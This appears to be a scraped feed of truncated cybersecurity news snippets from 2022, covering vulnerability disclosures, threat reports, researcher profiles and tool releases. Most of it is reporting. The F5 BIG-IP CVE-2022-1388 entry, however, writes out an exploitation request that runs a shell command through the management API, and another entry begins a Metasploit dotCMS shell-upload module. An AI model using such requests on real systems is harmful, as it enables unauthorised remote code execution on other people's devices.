User can bypass entryFee by sending arbitrary calldata to ParaSwap operator

Lines of code Vulnerability details Impact Any user is able to bypass the entryFee collection when using NestedFactory.create by passing in arbitrary calldata when using the ParaSwap router. High level, a user can pass in calldata to swap from a miniscule amount of input token to an ERC777 with...

Police Linked to Hacking Campaign to Frame Indian Activists

New details connect police in India to a plot to plant evidence on victims' computers that led to their arrest...

Trellix Threat Labs Uncovers Critical Flaws in Widely Used Building Access Control System

Trellix Threat Labs Uncovers Critical Flaws in Widely Used Building Access Control System By Trellix · June 9, 2022 This story was also written by Steve Povolny and Sam Quinn. Today at the Hardwear.io Security Trainings and Conference, Trellix Threat Labs is sharing new research into...

Trellix Threat Labs Uncovers Critical Flaws in Widely Used Building Access Control System

Trellix Threat Labs Uncovers Critical Flaws in Widely Used Building Access Control System By Trellix · June 9, 2022 This story was also written by Steve Povolny and Sam Quinn. Today at the Hardwear.io Security Trainings and Conference, Trellix Threat Labs is sharing new research into...

Cyber Security Giant Mandiant Denies Hacking Claims By LockBit Ransomware

By Deeba Ahmed According to a Mandiant representative, the company was aware of LockBit 2.0 claims, but there was no evidence of… This is a post from HackRead.com Read the original post: Cyber Security Giant Mandiant Denies Hacking Claims By LockBit Ransomware...

dotCMS Shell Upload

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'DotCMS RCE via Arbitrary File Upload.', 'Description' = %q When files are uploaded into dotCMS via the content API, but before they become conten...

Researchers Find New Malware Attacks Targeting Russian Government Entities

An unknown advanced persistent threat APT group has been linked to a series of spear-phishing attacks targeting Russian government entities since the onset of the Russo-Ukrainian war in late February 2022. "The campaigns ... are designed to implant a Remote Access Trojan RAT that can be used to...

The Justice Department Will No Longer Charge Security Researchers with Criminal Hacking

Following a recent Supreme Court ruling, the Justice Department will no longer prosecute "good faith" security researchers with cybercrimes: The policy for the first time directs that good-faith security research should not be charged. Good faith security research means accessing a computer solel...

A week in security (May 16 – 22)

Last week on Malwarebytes Labs: Fake reCAPTCHA forms dupe users via compromised WordPress sites How COVID-19 fuelled a surge in malware Why MRG-Effitas matters to SMBs “Look what I found here” phish targets Facebook users AirTag stalking: What is it, and how can I avoid it? Long lost @ symbol get...

Researcher Spotlight: Hector Peralta’s Evolution from Popcorn Server to the MSRC Leaderboards

“The bug bounty literally changed my life. Before this, I had nothing.” Coolest thing he purchased : His first vehicle! Best gift to give: Buying his nephew gaming accessories. Favorite Hacking Companion : His two cats. They’re always by his side when he is working late. Origin of his Hacker name...

Kali Linux 2022.2 - Penetration Testing and Ethical Hacking Linux Distribution

Time for another Kali Linux release! – Kali Linux 2022.2. This release has various impressive updates. The summary of the changelog since the 2022.1 release from February 2022 is: GNOME 42 - Major release update of the popular desktop environment KDE Plasma 5.24 - Version bump with a more...

Get to Know Steve Povolny

Meet Steve Povolny Head of Advanced Threat Research for Trellix Threat Labs By Michael Alicea · May 17, 2022 At Trellix, we celebrate and champion our people. This week, I sat down with Steve Povolny, Head of Advanced Threat Research for Trellix Threat Labs. As he is one of the leading...

CVE-2022-26923

creationtimestamp| type| source ---|---|--- 2022-05-11 04:00:00+00:00| seen| https://www.govcert.gov.hk/en/alertsdetail.php?id=801 2022-05-12 02:37:16+00:00| published-proof-of-concept| https://t.me/GithubRedTeam/2166 2022-05-12 11:01:01+00:00| seen| https://t.me/CyberSecurityTechnologies/5987...

Experts Sound Alarm on DCRat Backdoor Being Sold on Russian Hacking Forums

Cybersecurity researchers have shed light on an actively maintained remote access trojan called DCRat aka DarkCrystal RAT that's offered on sale for "dirt cheap" prices, making it accessible to professional cybercriminal groups and novice actors alike. "Unlike the well-funded, massive Russian...

A week in security (May 2 – 8)

Last week on Malwarebytes Labs: Google, Apple, and Microsoft step hand in hand into a passwordless future OpenSea warns of Discord channel compromise Avoid these Instagram “Get rich with Bitcoin” scams Steer clear of fake premium mobile app unlockers How Instagram scammers talk users out of their...

F5 BIG-IP Remote Code Execution

F5 BIG-IP RCE exploitation CVE-2022-1388 POST 1: POST /mgmt/tm/util/bash HTTP/1.1 Host: :8443 Authorization: Basic YWRtaW46 Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: 0 "command": "run" , "utilCmdArgs": " -c 'id' " curl commandliner: $ curl -i -s -k -X $'POST' -H $'Host: :8443' -H...

Exploit for Code Injection in Exiftool_Project Exiftool

Welcome to my Ethical Hacking Journey ==========================...

A week in security (April 25 – May 1)

Last week on Malwarebytes Labs: Why MITRE matters to SMBs Apple’s child safety features are coming to a Messages app near you Why software has so many vulnerabilities, with Tanya Janca: Lock and Code S03E09 Watch out for this SMS phish promising a tax refund Rogue ads phishing for cryptocurrency:...

Experts Detail 3 Hacking Teams Working Under the Umbrella of TA410 Group

A cyberespionage threat actor known for targeting a variety of critical infrastructure sectors in Africa, the Middle East, and the U.S. has been observed using an upgraded version of a remote access trojan with information stealing capabilities. Calling TA410 an umbrella group comprised of three...

QNAP Advises to Mitigate Remote Hacking Flaws Until Patches are Available

Network-attached storage NAS appliance maker QNAP on Wednesday said it's working on updating its QTS and QuTS operating systems after Netatalk last month released patches to contain seven security flaws in its software. Netatalk is an open-source implementation of the Apple Filing Protocol AFP,...